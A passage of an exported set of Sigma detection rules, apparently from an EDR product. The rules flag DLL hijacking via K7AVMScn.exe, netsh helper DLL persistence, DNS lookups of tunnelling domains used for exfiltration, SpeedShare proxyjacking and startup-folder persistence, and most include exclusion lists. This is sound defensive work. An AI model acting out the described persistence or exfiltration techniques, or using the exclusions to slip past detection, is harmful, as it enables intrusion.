"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide"
],
"name": "windows_defender_eventid_1117.yml",
"content": "title: Windows Defender has Taken Action against Malware\nid: faed7270-aa37-490a-818a-c476a47af917\ndescription: |\n Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.\nreferences:\n - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\ndate: 2021/10/29\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.privilege_escalation\n - attack.credential_access\n - classification.Windows.Source.EventLog\n - classification.Windows.Malware.Generic\nlogsource:\n product: windows\n service: defender\ndetection:\n selection:\n EventID: 1117\n Source: Microsoft-Windows-Windows Defender\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "faed7270-aa37-490a-818a-c476a47af917",
"rule_name": "Windows Defender has Taken Action against Malware",
"rule_description": "Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.\n",
"rule_creation_date": "2021-10-29",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fb14f890-84e4-4f00-9b82-2a6e82a275f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098003Z",
"creation_date": "2026-03-23T11:45:34.098005Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098009Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_k7avmscn.yml",
"content": "title: DLL Hijacking via K7AVMScn.exe\nid: fb14f890-84e4-4f00-9b82-2a6e82a275f2\ndescription: |\n Detects potential Windows DLL Hijacking via K7AVMScn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'K7AVMScn.exe'\n ImageLoaded|endswith: '\\K7AVWScn.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fb14f890-84e4-4f00-9b82-2a6e82a275f2",
"rule_name": "DLL Hijacking via K7AVMScn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via K7AVMScn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fbb59af6-3665-49a3-9ebb-8c2b47ebd651",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071580Z",
"creation_date": "2026-03-23T11:45:34.071582Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1546_007_persistence_netsh_dll.yml",
"content": "title: Netsh Helper DLL Persistence Added\nid: fbb59af6-3665-49a3-9ebb-8c2b47ebd651\ndescription: |\n Detects a suspicious persistence via netsh helper DLL.\n Netsh is a Windows utility which can be used by administrators to perform tasks related to the network configuration of a system.\n This functionality can be extended with the usage of DLL files and can be used by attackers to load arbitrary DLL’s to achieve code execution and persistence.\n It is recommended to ensure the legitimacy of the DLL specified in the registry.\nreferences:\n - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\n - https://attack.mitre.org/software/S0108/\ndate: 2021/04/14\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.007\n - attack.s0108\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Example: \"HKLM\\SOFTWARE\\Microsoft\\NetSh\\my malicious entry\"\n TargetObject|contains: 'HKLM\\Software\\Microsoft\\NetSh\\'\n\n exclusion_library:\n Details:\n - 'authfwcfg.dll'\n - 'dhcpcmonitor.dll'\n - 'dhcpmon.dll'\n - 'fwcfg.dll'\n - 'hnetmon.dll'\n - 'iasmontr.dll'\n - 'ipmontr.dll'\n - 'ippromon.dll'\n - 'netiohlp.dll'\n - 'netprofm.dll'\n - 'nettrace.dll'\n - 'nshdnsclient.dll'\n - 'nshhttp.dll'\n - 'nshipsec.dll'\n - 'nshwfp.dll'\n - 'peerdistsh.dll'\n - 'rasmontr.dll'\n - 'rpcnsh.dll'\n - 'WcnNetsh.dll'\n - 'whhelper.dll'\n - 'wshelper.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fbb59af6-3665-49a3-9ebb-8c2b47ebd651",
"rule_name": "Netsh Helper DLL Persistence Added",
"rule_description": "Detects a suspicious persistence via netsh helper DLL.\nNetsh is a Windows utility which can be used by administrators to perform tasks related to the network configuration of a system.\nThis functionality can be extended with the usage of DLL files and can be used by attackers to load arbitrary DLL’s to achieve code execution and persistence.\nIt is recommended to ensure the legitimacy of the DLL specified in the registry.\n",
"rule_creation_date": "2021-04-14",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fbd1dd7f-e811-4e68-a60e-275829775734",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603580Z",
"creation_date": "2026-03-23T11:45:34.603584Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603591Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1090/004/",
"https://attack.mitre.org/techniques/T1048/003/"
],
"name": "t1102_002_susp_domain_dns.yml",
"content": "title: Suspicious Domain Name Resolved\nid: fbd1dd7f-e811-4e68-a60e-275829775734\ndescription: |\n Detects a DNS resolution by an uncommon process to web services commonly used by attackers to exfiltrate or download malicious binaries.\n Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\n It is recommended to check if the process has legitimate reason to communicate with the service.\nreferences:\n - https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1090/004/\n - https://attack.mitre.org/techniques/T1048/003/\ndate: 2024/09/10\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1090.004\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|endswith:\n - '.trycloudflare.com'\n - '.pages.dev'\n - '.w3spaces.com'\n - '.workers.dev'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n exclusion_chrome:\n Image|endswith: '\\chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_misc_browser:\n - Image|endswith: '\\brave.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Brave Software, Inc.'\n - Image|endswith: '\\Application\\vivaldi.exe'\n - Image|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Opera Norway AS'\n - 'Opera Software AS'\n - Image|endswith: '\\Chromium\\thorium.exe'\n - Image|endswith: '\\SmartBrowser-Blink.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'OODRIVE S.A.S.'\n - Image|endswith:\n - '\\chromium\\chromium.exe'\n - '\\Chromium\\Application\\chrome.exe'\n - '\\GoogleChromePortable\\App\\Chrome-bin\\chrome.exe'\n - Image|endswith:\n - '\\jxbrowser\\chromium.exe'\n - '\\jxbrowser64\\chromium.exe'\n - ProcessOriginalFileName: 'zen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, OSCAR GONZALEZ MORENO'\n - Image|endswith: '\\MicrosoftEdgeCP.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\NisSrv.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_ublock:\n QueryName:\n - 'ublockorigin.pages.dev'\n - 'malware-filter.pages.dev'\n - 'phishing-filter.pages.dev'\n\n exclusion_speedtest:\n ProcessName: 'speedtest.exe'\n QueryName: 'orus.pages.dev'\n\n exclusion_genapi:\n Image|endswith: '\\GenApi.iNot.Client.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'GENAPI (Septeo Solutions Notaires SAS)'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fbd1dd7f-e811-4e68-a60e-275829775734",
"rule_name": "Suspicious Domain Name Resolved",
"rule_description": "Detects a DNS resolution by an uncommon process to web services commonly used by attackers to exfiltrate or download malicious binaries.\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\nIt is recommended to check if the process has legitimate reason to communicate with the service.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004",
"attack.t1090.004",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fbd6b8c0-1a30-46d6-8622-3e3f251c8be0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613658Z",
"creation_date": "2026-03-23T11:45:34.613662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613669Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_speedshare.yml",
"content": "title: SpeedShare Executed\nid: fbd6b8c0-1a30-46d6-8622-3e3f251c8be0\ndescription: |\n Detects the usage of SpeedShare, a bandwidth monetization platform similar to Traffmonetizer.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.SpeedShare\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: '/spdcli connect -p '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fbd6b8c0-1a30-46d6-8622-3e3f251c8be0",
"rule_name": "SpeedShare Executed",
"rule_description": "Detects the usage of SpeedShare, a bandwidth monetization platform similar to Traffmonetizer.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc3a404c-7d79-4d07-975a-c7ccf40276cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620449Z",
"creation_date": "2026-03-23T11:45:34.620451Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620455Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_file_startup.yml",
"content": "title: File Added/Modified in Startup Directory\nid: fc3a404c-7d79-4d07-975a-c7ccf40276cf\ndescription: |\n Detects when a file is added or modified in the startup directory.\n Adversaries may achieve persistence by adding a program to a startup folder.\n It is recommended to investigate the content of the newly created file to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n ProcessParentImage|startswith: '?:\\'\n\n filter_directory:\n Path|endswith:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp'\n\n exclusion_bad_extensions:\n Path|endswith:\n # ransomware activity for instance (\\!!!_READ_ME_A327C166_!!!.txt)\n - '.txt'\n - 'desktop.ini'\n - '\\bginfo.lnk'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_grouppolicy:\n # we need to WL svchost.exe with ProfSvc or gpsvc or GPSvcGroup in the command-line but we currently don\"t have this field in sigma for this event\n # C:\\windows\\system32\\svchost.exe -k GPSvcGroup\n Image:\n - '?:\\windows\\system32\\svchost.exe'\n - '?:\\windows\\syswow64\\svchost.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_parent:\n ProcessParentImage:\n - '?:\\Program Files\\Synology\\SynologyDrive\\bin\\launcher.exe'\n - '?:\\Program Files (x86)\\Synology\\SynologyDrive\\bin\\launcher.exe'\n - '?:\\Program Files\\Synology\\CloudStation\\bin\\launcher.exe'\n - '?:\\Program Files (x86)\\Synology\\CloudStation\\bin\\launcher.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistps1.exe'\n - '?:\\Program Files (x86)\\Zebra Technologies\\Zebra Setup Utilities\\Driver\\ZBRN\\StatMonSetup.exe'\n\n exclusion_onenote:\n Image:\n - '*\\office1?\\OneNote.exe' # C:\\Program Files (x86)\\Microsoft Office\\Office16\\ONENOTE.EXE / C:\\PROGRA~2\\MICROS~2\\Office16\\ONENOTE.EXE\n - '?:\\Windows\\System32\\dllhost.exe' # C:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}\n - '?:\\program files\\citrix\\user profile manager\\userprofilemanager.exe'\n - '?:\\windows\\explorer.exe'\n Path:\n - '*OneNote.lnk' # Envoyer a OneNote.lnk / Send to OneNote.lnk\n - '*\\an onenote senden.lnk'\n - '*\\OneNote ???? *.lnk' # OneNote 2010 Screen Clipper and Launcher.lnk / OneNote 2010 - Capture d'ecran et lancement.lnk\n\n exclusion_dropbox:\n # D:\\Profils\\XXXX\\AppData\\Roaming\\Dropbox\\bin\\Dropbox.exe\n Path|endswith: '\\Dropbox.lnk'\n Image: '*\\Dropbox.exe'\n\n exclusion_msdefender:\n # Microsoft System Center Data Protection Manager\n Path|endswith: '\\msdefender.jse'\n # image: C:\\Program Files\\Microsoft System Center\\DPM\\DPM\\bin\\DPMRA.exe\n # Path : C:\\Program Files\\Microsoft System Center\\DPM\\DPM\\Volumes\\Replica\\fdb3ead7-18a0-49a2-9de1-673e839a8b4e\\c66eb42f-e32b-4913-9459-67d54ed0049a\\Full\\ee5f7c51-a500-4723-9084-bdadfb26e458\\Full\\Profils\\xxxxx\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msdefender.jse\n Image: '*\\DPMRA.exe'\n\n exclusion_anydesk:\n Path|endswith: '\\AnyDesk.lnk'\n ProcessProduct: 'AnyDesk'\n\n exclusion_parallels:\n Path|endswith: '\\Parallels Client.lnk'\n # Image: '?:\\Program Files\\Parallels\\Client\\APPServerClient.exe'\n\n exclusion_msiexec:\n Image|endswith: '\\msiexec.exe'\n ProcessOriginalFileName: 'msiexec.exe'\n ProcessCommandLine|endswith: '\\msiexec.exe /V'\n ProcessParentImage|endswith: '\\services.exe'\n\n exclusion_ocsinventory:\n # also seen: OCS-NG-Windows-Agent-Setup.exe\n # Image|endswith: '\\OcsSetup.exe'\n ProcessCompany:\n - 'OCS Inventory NG Team'\n - 'OCS Inventory Team'\n Path|endswith: '\\OCS Inventory NG Systray.lnk'\n\n exclusion_setuphost:\n # C:\\$WINDOWS.~BT\\Sources\\setuphost.exe\n Image: '?:\\\\?WINDOWS.~BT\\Sources\\setuphost.exe'\n # C:\\Windows\\SoftwareDistribution\\Download\\065fd01c95189f768f95256d0434663a\\WindowsUpdateBox.exe\n # F:\\_SMSTaskSequence\\Packages\\AXN001B9\\sources\\setupprep.exe\n ProcessParentImage:\n - '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\WindowsUpdateBox.exe'\n - '*\\sources\\setupprep.exe'\n\n exclusion_synology:\n ProcessParentImage|endswith: '\\AppData\\Local\\SynologyDrive\\SynologyDrive.app\\bin\\cloud-drive-ui.exe'\n Path|endswith: '\\Synology Drive Client.lnk'\n\n exclusion_citrix:\n Image: '*\\AppData\\Local\\Citrix\\SelfService\\Program Files\\SelfService.exe'\n Path|endswith:\n - '\\Citrix Workspace.lnk'\n - '\\Citrix Receiver.lnk'\n\n exclusion_signiant:\n Image: '*\\appdata\\roaming\\signiant\\signiantapp.exe'\n Path|endswith: '\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\signiant app.lnk'\n\n exclusion_citrix_gateway:\n Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\syswow64\\msiexec.exe'\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Citrix Gateway.lnk'\n\n exclusion_dropnsign:\n Image: '*\\AppData\\Local\\Temp\\\\*\\signature-agent-install-?.?.?.tmp'\n Path|endswith: '\\Agent de signature DropNSign.lnk'\n\n exclusion_explorer_lnk:\n Image: '?:\\windows\\explorer.exe'\n Path|endswith:\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Outlook.lnk'\n # AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Outlook - Raccourci.lnk / handle multiple languages here\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Outlook - *.lnk'\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Sticky Notes.lnk'\n # 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MyNOEPhoneIPDesktop - Raccourci.lnk' / handle multiple languages here\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MyNOEPhoneIPDesktop - *.lnk'\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Envoyer à OneNote.lnk'\n\n exclusion_mcafee_scan:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\McAfee Security Scan Plus.lnk'\n\n exclusion_bmc:\n # C:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe\n # D:\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe\n Image|endswith: '\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n Path|endswith:\n - '\\Wikit.lnk'\n - ':\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ww_???' # (ww_283, ww_275, ...)\n - ':\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ww_????' # (ww_2110)\n - ':\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\UpdateSignatureOutlook.lnk'\n\n exclusion_empirium_agent:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Empirum Inventory.lnk'\n\n exclusion_zebra_browser_print:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ZebraBrowserPrint.lnk'\n\n exclusion_titreo_webscan:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\TitreoScan.lnk'\n\n exclusion_litetouch:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\LiteTouch.lnk'\n # C:\\Windows\\System32\\wscript.exe C:\\MININT\\Scripts\\LiteTouch.wsf /start\n ProcessCommandLine|contains: ':\\MININT\\Scripts\\LiteTouch.wsf'\n\n exclusion_starleaf:\n Path|endswith: 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\StarLeaf.lnk'\n # C:\\Users\\xxxxx\\AppData\\Local\\StarLeaf\\StarLeaf\\1\\StarLeaf.exe\n Image: '*\\AppData\\Local\\StarLeaf\\StarLeaf\\\\?\\StarLeaf.exe'\n\n exclusion_hp_ink_cartridge:\n # C:\\Windows\\system32\\RunDll32.exe C:\\Program Files\\HP\\HP ENVY 5540 series\\bin\\HPStatusBL.dll,RunDLLEntry SERIALNUMBER=XXXXX;CONNECTION=USB;MONITOR=1;\n # C:\\windows\\system32\\RunDll32.exe C:\\Program Files\\HP\\HP Officejet Pro 